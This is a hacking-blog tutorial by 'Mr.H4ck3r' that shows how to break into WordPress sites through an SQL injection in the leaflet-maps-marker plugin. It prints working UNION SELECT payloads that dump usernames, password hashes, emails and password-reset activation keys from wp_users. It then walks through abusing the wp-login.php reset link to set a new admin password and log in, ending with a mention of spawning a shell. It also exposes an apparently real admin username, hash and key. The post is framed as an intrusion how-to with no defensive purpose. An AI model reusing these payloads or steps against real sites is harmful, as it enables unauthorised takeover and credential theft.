[Latest News][6]

PC
andriod
Android
hack
Loots
ios
Iphone
andriod hack
ios9
iphone.ipad
hacks
recharge
windows
Windows phone
window phone
window
apps
linux
Amazing tricks
mac
windows 10
jailbreak
Facebook
facebook hack
windows xp
Tricks
hack windows xp
uber
whatsapp
free recharge
how to hack facebook account
nokia
tablet
website hack
COC
Clash-of-clans
OLA
POKEMON
Phissing
anonymous
hack a website
hack facebook
hak
hello
ola hack
ola unlimited
posting fake status
posting gif image in facebook
recover
reliance jio
user X The dark net
xp
1000rs note
500 note banned
ATM
India
Orkut
PM
PM Modi
POKEMON GO
Paytm
Teamuserx
askaman
attack
blank comment
blank status
browser
deals
email
flipkart
framework
funny
gmail
hack applock
lost contact
make invisible account
metasploit
metasploit framework
narendra modi
oy rooms
oyo
viral
wifi
wifi hack

How to hack Wordpress Website: A new way to inject site that use Wordpress Script

Hi Aman Is Here Once Again !


Today I'll show you How to inject site - word press - And enter to admin panel in Seconds .

lets say we have this vuln site :

PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 

and let's say We extracted column number and admin data [ user and passwors ] by sqli .

PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=0x00),(select (@) from (wp_users) where (@) in (@:=concat(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 -- 

admin logo : michelsenweb
admin password : $P$BPXdeAk4qo6ndqQWUJfuRkMOCqi.bJ0

now this password is difficult to crack it

ok now i will show you Easy way to login into the admin panel

first we going to admin panel and press / Lost your password? \

PHP Code:
www.site.com/wp-login.php 



[Image: U3AEA.png]

now we will put the admin user we found by injectin : michelsenweb .


[Image: mSLvQ.png]

like this 

[Image: UOrwJ.png]

now we haven't the admin mail to receive a link to create a new password 
or to get the activation key .

OK see what i will do !!!

now we will extracted user_activation_key by injection that we will use to grate new password

PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users 



[Image: TrMYL.png]

now we have the user_activation_key to this admin user : michelsenweb

michelsenweb:ADpMtuhLWYbPSubvKwgx

now we will use this Query to grate new password

PHP Code:
www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login 

replace : user_activation_key by ADpMtuhLWYbPSubvKwgx
replace : user_login by michelsenweb .

like this

PHP Code:
www.site.com/wp-login.php?action=rp&key=ADpMtuhLWYbPSubvKwgx&login=michelsenweb 


Spoiler (Click to Hide)
[Image: WLpdv.png]

now we get this page to grate now password after we Makes 
now password press Reset password


[Image: OjUVo.png]

ok let's try to log into admin panel by our new password


[Image: ANrW0.png]

aha we now in admin panel and now we can spawned shell


 Tutorial By Aman Kumar (Mr.H4ck3r)

About Author Mr.H4ck3R

Mr.h4ck3r A passionate blogger and Hacker! Love to play with electronics and softwares Get listed in India's Top 3rd website ! CEO at 👇 www.teamuserx.com. UserX:The Dark-Net is a Blog which publishes several articles each day about hardware and software hacks.You will get Unrevealed secrets of hacking. A hack refers to modifications of a product or software as well as creation of something new for convenience.Thanks to all the members of the blog for their contribution Himmy,Adz-shankyPhionex,Akay The Tech-Boy

No comments:

Post a Comment

TataCliq CPA

Start typing and press Enter to search